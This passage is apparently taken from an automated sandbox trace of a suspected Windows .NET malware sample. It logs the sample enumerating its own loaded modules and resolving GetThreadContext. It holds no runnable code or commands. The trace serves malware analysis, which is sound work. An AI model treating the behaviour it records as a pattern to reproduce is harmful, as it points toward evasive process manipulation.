"c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0108.670] CoTaskMemFree (pv=0x6b7760) [0108.670] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x2485ff4, cb=0xc | out: lpmodinfo=0x2485ff4*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0108.671] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.671] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0108.671] CoTaskMemFree (pv=0x6b7760) [0108.671] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.671] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0108.672] CoTaskMemFree (pv=0x6b7760) [0108.672] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x2488120, cb=0xc | out: lpmodinfo=0x2488120*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0108.672] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.672] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0108.673] CoTaskMemFree (pv=0x6b7760) [0108.673] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.673] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0108.674] CoTaskMemFree (pv=0x6b7760) [0108.674] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x248a22c, cb=0xc | out: lpmodinfo=0x248a22c*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0108.674] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.674] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0108.675] CoTaskMemFree (pv=0x6b7760) [0108.675] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.675] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0108.675] CoTaskMemFree (pv=0x6b7760) [0108.675] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x248c35c, cb=0xc | out: lpmodinfo=0x248c35c*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0108.676] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.676] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0108.684] CoTaskMemFree (pv=0x6b7760) [0108.684] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.684] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0108.685] CoTaskMemFree (pv=0x6b7760) [0108.685] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x248e490, cb=0xc | out: lpmodinfo=0x248e490*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0108.685] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.685] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0108.686] CoTaskMemFree (pv=0x6b7760) [0108.686] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.686] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0108.687] CoTaskMemFree (pv=0x6b7760) [0108.687] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x2490638, cb=0xc | out: lpmodinfo=0x2490638*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0108.688] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.688] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0108.688] CoTaskMemFree (pv=0x6b7760) [0108.688] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.688] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0108.689] CoTaskMemFree (pv=0x6b7760) [0108.689] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x249273c, cb=0xc | out: lpmodinfo=0x249273c*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0108.690] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.690] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0108.691] CoTaskMemFree (pv=0x6b7760) [0108.691] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.691] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0108.692] CoTaskMemFree (pv=0x6b7760) [0108.692] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x249487c, cb=0xc | out: lpmodinfo=0x249487c*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0108.694] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.694] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0108.695] CoTaskMemFree (pv=0x6b7760) [0108.695] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.695] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0108.696] CoTaskMemFree (pv=0x6b7760) [0108.696] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x2496990, cb=0xc | out: lpmodinfo=0x2496990*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0108.697] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.697] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0108.697] CoTaskMemFree (pv=0x6b7760) [0108.697] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.698] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0108.698] CoTaskMemFree (pv=0x6b7760) [0108.698] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x2498b2c, cb=0xc | out: lpmodinfo=0x2498b2c*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0108.699] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.699] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0108.700] CoTaskMemFree (pv=0x6b7760) [0108.700] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.700] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0108.701] CoTaskMemFree (pv=0x6b7760) [0108.701] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x249ace8, cb=0xc | out: lpmodinfo=0x249ace8*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0108.701] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.701] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0108.702] CoTaskMemFree (pv=0x6b7760) [0108.702] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.702] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0108.703] CoTaskMemFree (pv=0x6b7760) [0108.703] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x249cdec, cb=0xc | out: lpmodinfo=0x249cdec*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0108.704] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.704] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0108.705] CoTaskMemFree (pv=0x6b7760) [0108.705] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.705] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0108.706] CoTaskMemFree (pv=0x6b7760) [0108.706] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x249eef0, cb=0xc | out: lpmodinfo=0x249eef0*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0108.706] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.706] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0108.707] CoTaskMemFree (pv=0x6b7760) [0108.707] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.707] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0108.708] CoTaskMemFree (pv=0x6b7760) [0108.708] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, lpmodinfo=0x24a0ffc, cb=0xc | out: lpmodinfo=0x24a0ffc*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0108.709] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.709] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0108.710] CoTaskMemFree (pv=0x6b7760) [0108.710] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.710] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0108.711] CoTaskMemFree (pv=0x6b7760) [0108.711] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x24a3214, cb=0xc | out: lpmodinfo=0x24a3214*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0108.711] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.711] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0108.712] CoTaskMemFree (pv=0x6b7760) [0108.712] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.712] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0108.713] CoTaskMemFree (pv=0x6b7760) [0108.713] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x24a5328, cb=0xc | out: lpmodinfo=0x24a5328*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0108.714] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.714] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0108.715] CoTaskMemFree (pv=0x6b7760) [0108.715] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.715] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0108.715] CoTaskMemFree (pv=0x6b7760) [0108.715] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x24a7454, cb=0xc | out: lpmodinfo=0x24a7454*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0108.716] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.716] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0108.717] CoTaskMemFree (pv=0x6b7760) [0108.717] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.717] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0108.718] CoTaskMemFree (pv=0x6b7760) [0108.718] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x24a9560, cb=0xc | out: lpmodinfo=0x24a9560*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0108.719] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.719] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0108.720] CoTaskMemFree (pv=0x6b7760) [0108.720] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.720] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0108.721] CoTaskMemFree (pv=0x6b7760) [0108.721] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x24ab674, cb=0xc | out: lpmodinfo=0x24ab674*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0108.722] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.722] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0108.722] CoTaskMemFree (pv=0x6b7760) [0108.722] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.722] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0108.723] CoTaskMemFree (pv=0x6b7760) [0108.723] CloseHandle (hObject=0x32c) returned 1 [0108.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetThreadContext", cchWideChar=16, lpMultiByteStr=0x19eac4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThreadContext%\x1a2\x02b\x84Hó(ú\x1bo@î\x19", lpUsedDefaultChar=0x0) returned 16 [0108.729] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0108.750] GetCurrentProcessId () returned 0x139c [0108.750] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0108.750] EnumProcessModules (in: hProcess=0x32c, lphModule=0x24af864, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x24af864, lpcbNeeded=0x19eae0) returned 1 [0108.751] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x24af9a4, cb=0xc | out: lpmodinfo=0x24af9a4*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0108.751] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.751] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0108.751] CoTaskMemFree (pv=0x6b7aa0) [0108.751] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.751] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0108.752] CoTaskMemFree (pv=0x6b7aa0) [0108.752] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x24b1bc8, cb=0xc | out: lpmodinfo=0x24b1bc8*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0108.752] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.752] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0108.752] CoTaskMemFree (pv=0x6b7aa0) [0108.752] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.752] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0108.752] CoTaskMemFree (pv=0x6b7aa0) [0108.752] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x24b3ccc, cb=0xc | out: lpmodinfo=0x24b3ccc*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0108.753] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.753] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0108.753] CoTaskMemFree (pv=0x6b7aa0) [0108.753] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.753] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0108.753] CoTaskMemFree (pv=0x6b7aa0) [0108.753] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x24b5dd8, cb=0xc | out: lpmodinfo=0x24b5dd8*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0108.753] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.754] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0108.754] CoTaskMemFree (pv=0x6b7aa0) [0108.754] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.754] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0108.754] CoTaskMemFree (pv=0x6b7aa0) [0108.754] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x24b7eec, cb=0xc | out: lpmodinfo=0x24b7eec*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0108.754] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.754] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0108.755] CoTaskMemFree (pv=0x6b7aa0) [0108.755] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.755] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0108.756] CoTaskMemFree (pv=0x6b7aa0) [0108.756] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x24ba034, cb=0xc | out: lpmodinfo=0x24ba034*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0108.756] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.756] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0108.756] CoTaskMemFree (pv=0x6b7aa0) [0108.756] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.757] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0108.757] CoTaskMemFree (pv=0x6b7aa0) [0108.757] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x24bc140, cb=0xc | out: lpmodinfo=0x24bc140*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0108.757] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.757] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0108.758] CoTaskMemFree (pv=0x6b7aa0) [0108.758] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.758] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0108.758] CoTaskMemFree (pv=0x6b7aa0) [0108.758] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x24be254, cb=0xc | out: lpmodinfo=0x24be254*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0108.758] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.758] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0108.759] CoTaskMemFree (pv=0x6b7aa0) [0108.759] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.759] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0108.759] CoTaskMemFree (pv=0x6b7aa0) [0108.759] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x24c0360, cb=0xc | out: lpmodinfo=0x24c0360*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0108.759] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.759] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0108.760] CoTaskMemFree (pv=0x6b7aa0) [0108.760] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.760] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0108.760] CoTaskMemFree (pv=0x6b7aa0) [0108.760] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x24c24b8, cb=0xc | out: lpmodinfo=0x24c24b8*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0108.761] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.761] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0108.761] CoTaskMemFree (pv=0x6b7aa0) [0108.761] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.761] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0108.762] CoTaskMemFree (pv=0x6b7aa0) [0108.762] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x24c45c4, cb=0xc | out: lpmodinfo=0x24c45c4*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0108.762] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.762] 